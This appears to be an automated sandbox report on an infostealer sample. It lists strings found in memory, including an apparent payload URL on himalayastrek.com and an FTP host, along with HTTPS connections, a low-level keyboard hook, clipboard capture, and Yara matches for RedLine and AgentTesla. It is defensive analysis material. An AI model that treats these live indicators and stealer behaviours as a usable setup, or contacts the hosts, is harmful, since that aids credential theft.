Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029D6E000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.00000000227AD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.haliza.com.my
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0C
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: x.exe, x.exe, 00000003.00000002.1753574596.0000000021905000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1759764048.000000007FE2F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1752975519.0000000021700000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003028000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1721962152.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.000000000302C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000000.1719344100.0000000000416000.00000002.00000001.01000000.00000007.sdmp, xrbjyllC.pif, 0000000B.00000000.1826114660.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, sgxIb.exe, 0000000D.00000002.1890633912.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 0000000D.00000000.1888350846.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, xrbjyllC.pif, 00000011.00000002.2937816421.0000000025B6E000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000000.1995988945.0000000000416000.00000002.00000001.01000000.00000007.sdmp, sgxIb.exe, 00000012.00000002.2055006675.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe, 00000012.00000000.2054308600.0000000000416000.00000002.00000001.01000000.0000000C.sdmp, sgxIb.exe.9.dr, xrbjyllC.pif.3.dr	String found in binary or memory: http://www.pmail.com
Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2937049354.0000000025040000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: xrbjyllC.pif, 00000009.00000002.1885700149.0000000029C91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037584251.0000000026F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933710309.0000000022711000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.0000000000848000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/
Source: x.exe, 00000003.00000002.1721962152.000000000085E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/-
Source: Cllyjbrx.PIF, 00000010.00000002.2030287886.0000000020F7D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmng
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngHA
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000061C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_CllyjbrxmngZ
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.000000000064E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com/origins/233_Cllyjbrxmngy
Source: Cllyjbrx.PIF, 0000000A.00000002.1827777323.0000000000669000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com:443/origins/233_Cllyjbrxmng
Source: x.exe, 00000003.00000002.1721962152.000000000089F000.00000004.00000020.00020000.00000000.sdmp, Cllyjbrx.PIF, 00000010.00000002.1997779443.00000000008BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://himalayastrek.com:443/origins/233_CllyjbrxmngP
Source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, SKTzxzsJw.cs

.Net Code: _71ZRqC1D

Installs a global keyboard hook

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\xrbjyllC.pif

Creates a window with clipboard capturing capabilities

Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\Public\Libraries\xrbjyllC.pif	Window created: window name: CLIPBRDWNDCLASS

Yara detected Keylogger Generic

Source: Yara match

File source: Process Memory Space: x.exe PID: 4888, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2ace5190.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.29a80000.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.25040000.9.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0ee8.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26affca6.4.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.27fa5190.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.1.xrbjyllC.pif.400000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.1.xrbjyllC.pif.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c240000.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22130b8e.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.2c980000.9.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680ee8.7.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.22680000.6.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.3.xrbjyllC.pif.24f7d9c8.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 17.2.xrbjyllC.pif.23765190.8.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299f0b8e.4.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26b00b8e.5.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 9.2.xrbjyllC.pif.299efca6.5.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 9.2.xrbjyllC.pif.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.1.xrbjyllC.pif.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 11.2.xrbjyllC.pif.26ec0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
